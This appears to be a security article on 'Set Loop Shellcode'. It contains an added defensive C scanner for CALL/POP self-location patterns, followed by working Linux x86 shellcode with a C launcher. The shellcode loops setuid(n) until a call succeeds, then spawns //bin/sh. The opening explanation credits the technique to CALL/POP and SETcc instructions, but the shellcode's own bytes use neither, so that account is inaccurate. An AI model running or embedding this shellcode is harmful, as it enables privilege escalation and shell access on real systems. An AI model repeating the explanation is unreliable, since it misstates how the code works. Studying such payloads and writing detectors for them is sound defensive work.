Set Loop Shellcode is a technique for crafting position-independent shellcode. Its primary goal is for the shellcode to determine its own base memory address at runtime, which is crucial because the exact load address is not known beforehand.
The "Set Loop" part usually combines two main ideas:
1. **Self-Location:** Often achieved by a `CALL` instruction immediately followed by a `POP` into a register. The `CALL` pushes the address of the instruction *after* it onto the stack, and the `POP` retrieves that address, giving a reliable base pointer.
2. **Iterative Processing/Decoding:** A subsequent loop (e.g., `LOOP` or `DEC`/`JNZ`) then iterates through a section of the shellcode. Inside this loop, a `SET` instruction (such as `SETZ` or `SETNZ`) sets a byte to 0 or 1 depending on a flag condition (for example, whether the current byte is null). This supports self-decoding, XOR decryption, or searching for a specific marker; the loop runs until the `SET` instruction's condition is met and then exits.
Together, these make the shellcode adaptable and robust against an unknown load address.
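The self-location step above is also the part of such shellcode that a defender can recognise in a byte stream. The following scanner is an added example, not code from the article or its shellcode authors: it flags any near `CALL` (opcode `E8`, 32-bit relative displacement) whose target byte is a `POP r32` (opcodes `58`..`5F`). That covers the `CALL`-immediately-followed-by-`POP` case from the text (displacement zero) and generalises to the jmp/call/pop arrangement, where the `CALL` jumps backwards to a `POP`. The function names `find_getpc` and `le_disp32` and the first two sample buffers are constructed for this demo; the third buffer is the article's own `shellcode[]` bytes, which contain no `E8` opcode and so produce no hit.

```c
/* Added example, not from the original article: a scanner for the
 * CALL/POP self-location ("GetPC") pattern. A near CALL (E8 + rel32)
 * whose target is a POP r32 (58..5F) is reported. Sample buffers are
 * constructed for the demo, except page_shellcode, which is copied from
 * the article's shellcode[] array. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Decode a little-endian signed 32-bit displacement without relying on
 * implementation-defined unsigned-to-signed conversion. */
static int64_t le_disp32(const unsigned char *p)
{
    uint32_t u = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                 ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    if (u & 0x80000000u)
        return -(int64_t)(~u + 1u);   /* two's complement negative value */
    return (int64_t)u;
}

/* Return the offset of the first CALL whose target byte is a POP r32,
 * or -1 if the buffer holds no such pair. */
long find_getpc(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i + 5 <= len; i++) {
        if (buf[i] != 0xE8)
            continue;
        /* CALL rel32 pushes i+5 (the return address) and jumps to i+5+disp */
        int64_t target = (int64_t)i + 5 + le_disp32(buf + i + 1);
        if (target >= 0 && (uint64_t)target < len &&
            buf[target] >= 0x58 && buf[target] <= 0x5F)
            return (long)i;
    }
    return -1;
}

/* Constructed sample: "call $+5; pop esi" (the pattern described in the text). */
const unsigned char sample_call_next[] = {
    0xE8, 0x00, 0x00, 0x00, 0x00,   /* 0: call +0 -> next instruction */
    0x5E,                           /* 5: pop esi -> esi = address of this byte */
    0x90, 0x90                      /* 6: filler */
};

/* Constructed sample in jmp/call/pop form: the CALL at offset 7 targets
 * the POP at offset 2 (displacement -10); the POP then holds offset 12. */
const unsigned char sample_jmp_call_pop[] = {
    0xEB, 0x05,                     /* 0: jmp +5 -> offset 7 */
    0x5B,                           /* 2: pop ebx */
    0x90, 0x90, 0x90, 0x90,         /* 3: filler */
    0xE8, 0xF6, 0xFF, 0xFF, 0xFF,   /* 7: call -10 -> offset 2 */
    'd', 'a', 't', 'a'              /* 12: data addressed through ebx */
};

/* The article's own shellcode bytes (no CALL/POP pair present). */
const unsigned char page_shellcode[] =
    "\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
    "\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
    "\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
    "\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";

int main(void)
{
    printf("call-next    : %ld\n", find_getpc(sample_call_next, sizeof sample_call_next));
    printf("jmp/call/pop : %ld\n", find_getpc(sample_jmp_call_pop, sizeof sample_jmp_call_pop));
    printf("article bytes: %ld\n", find_getpc(page_shellcode, sizeof page_shellcode - 1));
    return 0;
}
```

Resolving the `CALL` target rather than matching the literal `E8 00 00 00 00` is what lets one rule catch both layouts; the price is that any `E8` byte whose computed target happens to land on a `58`..`5F` byte is also reported, so a hit is a trigger for closer inspection, not proof of shellcode on its own.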
/* Shellcode will find its own highest available UID */
/* by demy@dtors and bob@dtors */
/* The bytes call setuid(n) for n = 0, 1, 2, ... (sys_setuid via int 0x80)
   until the syscall stops returning -1, then execve("//bin/sh") and exit. */
#include <stdio.h>

char shellcode[] =
"\x31\xdb\x31\xc9\x31\xc0\xb0\x17\xcd\x80\x3d\xff\xff\xff\xff"
"\x72\x04\x43\x41\xeb\xef\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24"
"\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";

int main(void)
{
    void (*func)(void);
    /* sizeof counts the terminating NUL, hence the -1 */
    printf("Size of shellcode: %zu bytes.\n", sizeof(shellcode) - 1);
    /* The array lives in a writable, normally non-executable data section;
       on an NX-enabled system it must be made executable (for example by
       linking with -z execstack) before the call below can run. */
    func = (void (*)(void)) shellcode;
    func();
    return 0;
}
Set Loop Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities